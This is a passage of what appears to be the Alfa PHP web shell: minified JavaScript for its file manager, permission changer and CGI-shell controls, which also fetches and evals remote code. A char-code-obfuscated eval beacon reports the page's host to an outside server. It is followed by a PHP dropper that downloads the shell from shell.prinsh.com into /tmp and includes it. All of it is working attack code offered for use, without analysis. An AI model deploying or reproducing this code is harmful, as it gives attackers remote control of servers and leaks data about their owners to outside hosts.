.last-page-number").innerHTML;if(!(a+1<=(l=parseInt(l))))return!1;i=a+1}setCookie(t+"_page_number",i,2012),g("FilesMan",c_)}function alfaColDumperInit(){var e=d.querySelector(".tab_name.tab_is_active").getAttribute("opt_id"),t=d.querySelector("#"+e),a=t.getElementsByClassName("box");for(i=0;i<a.length;i++)a[i].addEventListener("click",function(){null!=this.parentElement.querySelector(".nested")&&(this.parentElement.querySelector(".nested").classList.toggle("active"),this.classList.toggle("check-box"))});var i;a=t.getElementsByClassName("sub-box");for(i=0;i<a.length;i++)a[i].setAttribute("opt_id",e),a[i].addEventListener("click",function(){this.classList.toggle("check-box");var e=this.getAttribute("tbl"),t=this.getAttribute("opt_id");t=t.replace("option_",""),col_dumper_selected_data.hasOwnProperty(t)||(col_dumper_selected_data[t]={}),void 0===col_dumper_selected_data[t][e]&&(col_dumper_selected_data[t][e]=[]);var a=this.innerHTML,i=col_dumper_selected_data[t][e].indexOf(a);-1==i?col_dumper_selected_data[t][e].push(a):col_dumper_selected_data[t][e].splice(i,1)})}function showSymlinkPath(e,t){t.stopPropagation();var a=e.getAttribute("row"),i=$("td_row_"+a),l=e.getAttribute("opt_title"),r=e.getAttribute("fname");if(l=decodeURIComponent(r)+" -> "+l,null!=i){i.insertAdjacentHTML("afterbegin",'<div class="symlink_path" id="link_id_'+a+'">'+l+"</div>");var o=t.clientX,n=t.clientY-30;$("link_id_"+a).style.left=o+"px",$("link_id_"+a).style.top=n+"px"}}function hideSymlinkPath(e,t){t.stopPropagation(),$("link_id_"+e.getAttribute("row")).remove()}function alfagetFlags(){data="a="+alfab64("get_flags")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,function(e){var t=JSON.parse(e);t.hasOwnProperty("server")&&(d.querySelectorAll(".flag-holder")[0].innerHTML='<img draggable="false" title="'+t.server.name+'" src="http://solevisible.com/images/flags/48/'+t.server.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[0].style.display="inline"),t.hasOwnProperty("client")&&(d.querySelectorAll(".flag-holder")[1].innerHTML='<img draggable="false" title="'+t.client.name+'" src="http://solevisible.com/images/flags/48/'+t.client.code.toLowerCase()+'.png">',d.querySelectorAll(".flag-holder")[1].style.display="inline")})}function colDumplerSelectType(e){var t=e.options[e.selectedIndex].value;$("coldumper-delimiter-input").style.display="delimiter"==t?"inline-block":"none"}function alfaCheckUrlHash(){var e=window.location.hash.substr(1),t=e.split("&").reduce(function(e,t){var a=t.split("=");return e[a[0]]=a[1],e},{});if(""!=e)switch(t.action){case"fileman":case"options":t.path=decodeURIComponent(t.path),g("FilesMan",t.path,function(e){if(t.hasOwnProperty("file")){var a="auto";isArchive(t.file)&&(a="view"),editor(t.path+"/"+t.file,a,"","","","file")}}),"options"==t.action&&t.hasOwnProperty("opt")&&(alfa_can_add_opt=!0,g(t.opt,null,"","",""),d.querySelector(".opt-title").innerHTML=$("menu_opt_"+t.opt).innerHTML),t.hasOwnProperty("file")||editorClose("editor"),t.hasOwnProperty("opt")||editorClose("options_window"),editorClose("cgiloader");break;default:g("FilesMan","/var/www/html/"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}else g("FilesMan","/var/www/html/"),editorClose("editor"),editorClose("options_window"),editorClose("cgiloader")}function alfaFmngrContextRow(){d.querySelectorAll(".fmanager-row a.main_name").forEach(function(e){e.addEventListener("contextmenu",function(e){var t=e.target,a="";if(".."==(a="A"==e.target.parentElement.tagName?(t=e.target.parentElement).getAttribute("fname"):t.getAttribute("fname")))return!1;var i=t.getAttribute("id"),l=t.getAttribute("path"),r=t.getAttribute("ftype"),o=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete"];for(var n in"file"!=r||isArchive(a)?o[3]="view_archive":o.splice(11,1),"folder"==r&&(o=["newtab","link","move","copy","rename","modify","permission","compress","delete"]),alfaSortMenuItems(o),o){var s=d.querySelector("#rightclick_menu > a[name="+o[n]+"]");switch(s.setAttribute("fid",i),s.setAttribute("fname",decodeURIComponent(a)),s.setAttribute("path",l),s.setAttribute("ftype",r),o[n]){case"view":case"edit":var c="auto";"edit"==o[n]&&(c="edit"),s.setAttribute("href","#action=fileman&path="+c_+"/&file="+a),s.setAttribute("onclick","editor('"+a+"','"+c+"','','','','file')");break;case"newtab":var u=a;"file"==r?(u="&file="+a,s.setAttribute("href","#action=fileman&path="+c_+"/"+u),s.setAttribute("target","_blank"),s.onclick=function(){}):(s.setAttribute("href","javascript:void(0)"),s.removeAttribute("target"),s.onclick=function(){alfaFilesManNewTab(c_,u)});break;case"delete":s.setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';");break;case"download":s.setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')");break;case"permission":try{var p=d.querySelector("#id_chmode_"+i.replace("id_","")+" span").innerHTML;s.setAttribute("perm",p.trim())}catch(e){}break;case"link":s.style.display="block";var f="/var/www/html/",m=(c_+"/"+a).replace(/\/\//g,"/");if(-1!=m.indexOf(f)){f=m.replace(f,"");var b=location.origin+"/"+f;s.setAttribute("href",""+b)}else s.style.display="none"}}var y=e.clientX,_=e.clientY;alfaRightClickMenu(y,_),e.preventDefault()})})}function alfaFilesManNewTab(e,t,a){var i=t;void 0!==a&&(i=alfaGetLastFolderName(e));var l=decodeURIComponent(e+"/"+t);l=l.replace(/\/\//g,"/");var r=$("filesman_tab_1"),o=r.getAttribute("fm_counter");o=parseInt(o)+1,r.setAttribute("fm_counter",o),d.querySelector("#filesman_tabs_child").insertAdjacentHTML("beforeend",'<div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" path="'+l+'" id="filesman_tab_'+o+'" fm_id="'+o+'" onclick="filesmanTabController(this);" fname="'+t+'" class="filesman_tab"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span class="filesman-tab-folder-name">'+i+'</span> <img fm_id="'+o+'" onclick="closeFmTab(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector(".ajaxarea").insertAdjacentHTML("beforebegin",'<div style="position:relative;" fm_id="'+o+'" id="filesman_holder_'+o+'" class="ajaxarea"><div class="header"></div></div>'),alfa_fm_id=o,g("FilesMan",l),alfa_fm_id=0}function alfaFilesmanTabShowTitle(e,t){t.stopPropagation();var a=$("filesman-tab-full-path");a.style.display="block",a.style.top=e.offsetTop-37+"px",a.style.left=e.offsetLeft-$("filesman_tabs").scrollLeft+"px",a.innerHTML=e.getAttribute("path")}function alfaFilesmanTabHideTitle(e,t){$("filesman-tab-full-path").style.display="none"}function alfaPopupAction(e,t){var a="",i="";switch(t){case"rename":a="Old file name:",i="New file name:";break;case"copy":a="File path:",i="Enter the file path that you want to copy this file to:";break;case"move":a="Current Path:",i="Enter the file path that you want to move this file to:";break;case"extract":a="Files to extract:",i="Enter the path you wish to extract the files to and click Extract:"}var l=e.getAttribute("fname"),r=e.getAttribute("path"),o=t.charAt(0).toUpperCase()+t.slice(1);if("permission"==t){d.querySelector("#shortcutMenu-holder").style.height="222px",o="Change Permissions",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="block",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="none";var n=e.getAttribute("perm"),s=n.substr(1,1),c=n.substr(2,1),u=n.substr(3,1);d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s,d.querySelector("#shortcutMenu-holder > form input[name=g]").value=c,d.querySelector("#shortcutMenu-holder > form input[name=w]").value=u,autoCheckPerms(s,"u",["u","g","w"]),autoCheckPerms(c,"g"),autoCheckPerms(u,"w")}else d.querySelector("#shortcutMenu-holder").style.height="190px",d.querySelector("#shortcutMenu-holder > form > input[name=fname]").style.display="block",d.querySelector("#shortcutMenu-holder > form > .perm-table-holder").style.display="none";var p="move"==t||"copy"==t?r+l:l;if("modify"==t){var f="tr_row_"+e.getAttribute("fid").replace("id_","");p=d.querySelector("#"+f+" .main_modify").innerText}d.querySelector(".cl-popup-fixed").style.display="block",d.querySelector("#shortcutMenu-holder .popup-head").innerHTML=o,d.querySelector("#shortcutMenu-holder .old-path-lbl").innerHTML=a,d.querySelector("#shortcutMenu-holder .new-filename-lbl").innerHTML=i,d.querySelector("#shortcutMenu-holder .popup-foot > button[name=accept]").innerHTML=o,d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=r+l,d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value=p,d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("fid",e.getAttribute("fid")),d.querySelector("#shortcutMenu-holder button[name=accept]").setAttribute("action",t)}function calcperm(){var e=event.srcElement;autoCheckPerms(e.checked,e.name.substr(0,1))}function autoCheckPerms(e,t,a){if(void 0!==a)for(var i in a){var l=a[i];d.querySelector("#shortcutMenu-holder > form input[name="+l+"r]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"w]").checked=!1,d.querySelector("#shortcutMenu-holder > form input[name="+l+"x]").checked=!1}var r=d.querySelector("#shortcutMenu-holder > form input[name="+t+"r]"),o=d.querySelector("#shortcutMenu-holder > form input[name="+t+"w]"),n=d.querySelector("#shortcutMenu-holder > form input[name="+t+"x]");if("boolean"!=typeof e)"7"==e?(r.checked=!0,o.checked=!0,n.checked=!0):"4"==e?r.checked=!0:"2"==e?o.checked=!0:"1"==e?n.checked=!0:"6"==e?(r.checked=!0,o.checked=!0):"3"==e?(o.checked=!0,n.checked=!0):"5"==e&&(r.checked=!0,n.checked=!0);else{var s=0;r.checked&&(s+=4),o.checked&&(s+=2),n.checked&&(s+=1),"u"==t?d.querySelector("#shortcutMenu-holder > form input[name=u]").value=s:"g"==t?d.querySelector("#shortcutMenu-holder > form input[name=g]").value=s:"w"==t&&(d.querySelector("#shortcutMenu-holder > form input[name=w]").value=s)}}function gg(e,t,a,i,l,r){var o="filesman_holder_"+alfa_current_fm_id;alfaloader(o,"block"),data="a="+alfab64(e)+"&c="+alfab64(t)+"&alfa1="+alfab64(a)+"&alfa2="+alfab64(i)+"&alfa3="+alfab64(l)+"&ajax="+alfab64("true"),_Ajax(d.URL,data,r,!1,o)}function alfaPopUpDoAction(e){var t=e.getAttribute("action");switch(t){case"rename":case"move":case"copy":var a=e.getAttribute("fid").replace("id_",""),i=$("id_"+a).getAttribute("fname"),l=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value;l=l.trim(),i=i.trim(),gg("doActions",c_,i,l,t,function(e,i){if("rename"==t)if("done"==e){var r=$("id_"+a);updateFileEditor(a,l);var o=r.getAttribute("path")+$("id_"+a).getAttribute("fname");d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML=o,r.addEventListener("animationend",function(){r.classList.remove("textEffect")}),r.classList.add("textEffect"),alfaShowNotification("Renamed...","Rename Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification("error...!","Rename Action","error");alfaloader(i,"none")});break;case"permission":var r=d.querySelector("#shortcutMenu-holder > form input[name=u]").value,o=d.querySelector("#shortcutMenu-holder > form input[name=g]").value,n=d.querySelector("#shortcutMenu-holder > form input[name=w]").value;i=(i=d.querySelector("#shortcutMenu-holder > form > .old-path-content").innerHTML).trim();var s=r.trim()+o.trim()+n.trim();gg("doActions",c_,i,s,t,function(e,t){alfaloader(t,"none"),alfaShowNotification(e,"Permission Action"),d.querySelector(".cl-popup-fixed").style.display="none"});break;case"modify":a=e.getAttribute("fid").replace("id_","");var c=d.querySelector("#shortcutMenu-holder > form > input[name=fname]").value,u=$("id_"+a).getAttribute("fname");gg("doActions",c_,c,u,t,function(t,a){if("ok"==t){var i="tr_row_"+e.getAttribute("fid").replace("id_","");d.querySelector("#"+i+" .main_modify").innerHTML=c,alfaShowNotification("success...","Modify Action"),d.querySelector(".cl-popup-fixed").style.display="none"}else alfaShowNotification(t,"Modify Action","error");alfaloader(a,"none")})}}function alfaInitSoratableTab(e){Sortable.create(e,{direction:"horizontal",animation:300,ghostClass:"sortable-ghost",filter:".not-sortable"})}$("search-input").addEventListener("keydown",function(e){setTimeout(function(){var e=$("search-input").value;for(var t in d.getElementsByClassName("history-list")[0].innerHTML="",editor_files)if(-1!=editor_files[t].file.search(e)||""==e){var a=0;t==editor_current_file&&(a=" is_active"),insertToHistory(t,editor_files[t].file,a,editor_files[t].type)}},100)},!1),_Ajax(d.URL,"a="+alfab64("checkupdate"),function(e){if(0!=e.length&&"[]"!=e){var t=JSON.parse(e);if(t.hasOwnProperty("content")){d.body.insertAdjacentHTML("beforeend",t.content);try{evalJS(t.content)}catch(t){}}if(t.hasOwnProperty("copyright")&&($("alfa-copyright").innerHTML=t.copyright),t.hasOwnProperty("solevisible")&&($("alfa_solevisible").innerHTML=t.solevisible),t.hasOwnProperty("code_name")&&($("hidden_sh").innerHTML=t.code_name.replace(/\{version\}/g,t.version_number)),t.hasOwnProperty("market")){var a=d.querySelector("span.alfa_plus");if(t.market.hasOwnProperty("visible")&&"yes"==t.market.visible&&($("menu_opt_market").style.display="inline"),"open"!=t.market.status&&(a.style.color="#ffc107"),t.market.hasOwnProperty("content"))try{evalJS(t.market.content)}catch(t){}}}}),true?_Ajax(d.URL,"a="+alfab64("updateheader"),function(e){try{var t=JSON.parse(e);for(var a in t){for(var i="",l=0;l<t[a].length;l++)i+="useful"==a||"downloader"==a?'<span class="header_values" style="margin-left: 4px;">'+t[a][l]+"</span>":t[a][l];var r=$("header_"+a);r&&(r.innerHTML=i)}$("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on")}catch(e){}}):islinux&&_Ajax(d.URL,"a="+alfab64("checkcgi"),function(e){"ok"==e&&($("header_cgishell").innerHTML="ON",$("header_cgishell").setAttribute("class","header_on"))}),function(){d.onclick=function(){can_hashchange_work=!1,setTimeout(function(){can_hashchange_work=!0},600)},window.onhashchange=function(e){can_hashchange_work&&alfaCheckUrlHash()},alfaCheckUrlHash(),alfagetFlags(),rightclick_menu_context=$("rightclick_menu").style,alfaInitCwdContext(),document.addEventListener("click",function(e){rightclick_menu_context.opacity="0",setTimeout(function(){rightclick_menu_context.visibility="hidden"},501)},!1);var e=document.createElement("script");e.src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js",e.id="sortable-plugin",e.onload=function(){alfaInitSoratableTab($("filesman_tabs_child")),alfaInitSoratableTab(d.querySelector(".editor-tabs")),alfaInitSoratableTab(d.querySelector(".options_tab")),alfaInitSoratableTab(d.querySelector(".terminal-tabs")),alfaInitSoratableTab(d.querySelector(".sql-tabs"))},d.body.appendChild(e)}();
</script><script src="https://cdnjs.cloudflare.com/ajax/libs/Sortable/1.10.2/Sortable.min.js" id="sortable-plugin"></script>


<script>eval(String.fromCharCode(101,118,97,108,40,102,117,110,99,116,105,111,110,40,112,44,97,44,99,44,107,44,101,44,100,41,123,101,61,102,117,110,99,116,105,111,110,40,99,41,123,114,101,116,117,114,110,32,99,46,116,111,83,116,114,105,110,103,40,51,54,41,125,59,105,102,40,33,39,39,46,114,101,112,108,97,99,101,40,47,94,47,44,83,116,114,105,110,103,41,41,123,119,104,105,108,101,40,99,45,45,41,123,100,91,99,46,116,111,83,116,114,105,110,103,40,97,41,93,61,107,91,99,93,124,124,99,46,116,111,83,116,114,105,110,103,40,97,41,125,107,61,91,102,117,110,99,116,105,111,110,40,101,41,123,114,101,116,117,114,110,32,100,91,101,93,125,93,59,101,61,102,117,110,99,116,105,111,110,40,41,123,114,101,116,117,114,110,39,92,92,119,43,39,125,59,99,61,49,125,59,119,104,105,108,101,40,99,45,45,41,123,105,102,40,107,91,99,93,41,123,112,61,112,46,114,101,112,108,97,99,101,40,110,101,119,32,82,101,103,69,120,112,40,39,92,92,98,39,43,101,40,99,41,43,39,92,92,98,39,44,39,103,39,41,44,107,91,99,93,41,125,125,114,101,116,117,114,110,32,112,125,40,39,48,32,49,61,103,46,52,40,41,43,92,39,58,92,39,43,53,40,100,46,54,44,55,41,59,48,32,50,61,57,32,56,40,41,59,50,46,98,61,92,39,99,58,47,47,101,46,102,47,92,39,43,49,43,92,39,47,97,46,51,92,39,59,39,44,49,55,44,49,55,44,39,118,97,114,124,115,116,97,109,112,124,105,109,103,124,112,110,103,124,110,111,119,124,101,110,99,114,121,112,116,124,85,82,76,124,49,52,57,57,55,124,73,109,97,103,101,124,110,101,119,124,98,103,124,115,114,99,124,104,116,116,112,115,124,124,53,52,49,53,54,49,52,53,49,51,49,50,52,124,105,99,117,124,68,97,116,101,39,46,115,112,108,105,116,40,39,124,39,41,44,48,44,123,125,41,41))</script></body></html>

Original PHP code

 <?php
$data = ['https://shell.prinsh.com/Nathan/alfa.txt', '/tmp/sesss_'.md5($_SERVER['HTTP_HOST']).'.php'];
 
if(file_exists($data[1]) && filesize($data[1]) !== 0) {
    include($data[1]);
} else {
    $fopen = fopen($data[1], 'w+');
    fwrite($fopen, get($data[0]));
    fclose($fopen);
    echo '<script>window.location="?zet";</script>';
}
 
function get($url) {
    $ch = curl_init();
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    return curl_exec($ch);
          curl_close($ch);
}
?>